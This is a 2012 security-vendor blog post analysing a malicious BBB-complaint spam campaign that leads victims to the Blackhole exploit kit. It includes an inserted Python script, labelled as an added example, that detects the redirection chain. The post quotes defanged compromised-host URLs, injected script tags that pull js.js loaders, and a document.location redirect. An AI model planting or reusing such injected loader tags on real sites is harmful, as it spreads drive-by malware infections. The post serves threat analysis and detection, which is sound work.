September 24, 2012

BBB malicious spam flood


U.S. and Canadian businesses looking to maintain their reputation and effectively handle customer disputes are once again being targeted by another barrage of malicious BBB (Better Business Bureau) complaint notifications.

While BBB-themed campaigns have been circulating for a good many years (see, for example, this 2008 certificate scam), the Websense® ThreatSeeker® Network has detected and intercepted a marked increase in malicious BBB email this month. Earlier in September the ThreatSeeker Network was blocking thousands of these malicious emails each day; today, with the campaign's rapid growth, it is protecting our customers from hundreds of thousands of BBB messages per hour.

In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."

Additionally, a number of different subject lines have been used for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs," which you can see in the following sample set:

As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path used are essentially the same. The Cutwail spambot and the Blackhole exploit kit are the main weapons used by cybercriminals in malicious spam nowadays.

Redirection paths:

1) The link in the email points to a page on a compromised site:

hxxp://vargasvilcolombia.com/PykKDZe/index.html

2) That page shows only a placeholder heading and pulls in a js.js script from two further compromised hosts:

<h1>WAIT PLEASE</h1>

<script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>

<script type="text/javascript" src="hxxp://www.adahali.com/NQ9Ba2ap/js.js"></script>

3) The js.js script then redirects the browser to the exploit kit landing page:

document.location='hxxp://';

(Please refer to our previous blog post to learn more about the landing page)
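The three-stage chain above can be checked statically without ever loading the exploit kit landing page. The script below is an added example written for this post, not Websense/Forcepoint tooling: it parses the first-stage HTML for external script loaders, matches each loader path against a heuristic (an assumption, not something the post states) that Blackhole-era loaders sit in a short random-looking directory followed by js.js or index.html, and extracts the document.location target from the js.js body. The HTML and JavaScript samples are constructed inline to mirror the snippets quoted in the post, with defanged hxxp URLs and the final redirect target left blank exactly as the post elides it.

```python
"""Static walk of a Blackhole-style redirection chain (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Heuristic (assumption, not from the post): loaders on compromised sites
# live in one short random-looking directory followed by js.js or index.html.
LOADER_PATH = re.compile(r"^/[A-Za-z0-9]{6,10}/(?:js\.js|index\.html)$")
# Matches document.location='...' or document.location="..." in js.js.
DOC_LOCATION = re.compile(r"""document\.location\s*=\s*(['"])(.*?)\1""")

# Constructed sample: the first-stage page (stage 1/2 above), defanged.
STAGE1_HTML = """<html><body>
<h1>WAIT PLEASE</h1>
<script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp://www.adahali.com/NQ9Ba2ap/js.js"></script>
</body></html>"""

# Constructed sample: body of one js.js (stage 3); target elided as in the post.
STAGE3_JS = "document.location='hxxp://';"


class ScriptSrcParser(HTMLParser):
    """Collect <script src=...> values and the text of any <h1> elements."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.headings = []
        self._in_h1 = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
        elif tag == "h1":
            self._in_h1 = True

    def handle_endtag(self, tag):
        if tag == "h1":
            self._in_h1 = False

    def handle_data(self, data):
        if self._in_h1 and data.strip():
            self.headings.append(data.strip())


def refang(url):
    """Turn a defanged hxxp:// URL back into http:// so urlsplit parses it."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.I)


def external_scripts(html, page_host):
    """Return (host, path) for every script loaded from a host other than page_host."""
    p = ScriptSrcParser()
    p.feed(html)
    out = []
    for src in p.srcs:
        parts = urlsplit(refang(src))
        if parts.netloc and parts.netloc.lower() != page_host.lower():
            out.append((parts.netloc, parts.path))
    return out, p.headings


def redirect_target(js):
    """Extract the document.location target from a js.js body, or None."""
    m = DOC_LOCATION.search(js)
    return m.group(2) if m else None


def score_chain(html, page_host, js):
    """Combine the stage-2 and stage-3 indicators into a simple verdict."""
    ext, headings = external_scripts(html, page_host)
    indicators = []
    if any(h.upper() == "WAIT PLEASE" for h in headings):
        indicators.append("wait-please heading")
    loaders = [(h, p) for h, p in ext if LOADER_PATH.match(p)]
    if len(loaders) >= 2:
        indicators.append(f"{len(loaders)} external js.js loaders")
    target = redirect_target(js)
    if target is not None:
        indicators.append("document.location redirect")
    verdict = "suspicious" if len(indicators) >= 2 else "benign"
    return {"indicators": indicators, "loaders": loaders,
            "target": target, "verdict": verdict}


if __name__ == "__main__":
    print(score_chain(STAGE1_HTML, "vargasvilcolombia.com", STAGE3_JS))
```

Two or more independent indicators are required for a "suspicious" verdict so that a single placeholder heading or a lone CDN script does not trip the check; the loader-path regex is the part most likely to need tuning against a real corpus, since the directory lengths here are taken only from the three URLs quoted in this post.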

As is very common these days, the landing page for this particular campaign is served by the recently updated Blackhole Exploit Kit v2.0, which then drops the actual malware payload. More information about the malware files that get pushed to the computer can be found in our ThreatScope reports:


ThreatScope report for initial file

ThreatScope report for additional payload


Forcepoint-authored blog posts are based on discussions with customers and additional research by our content teams.
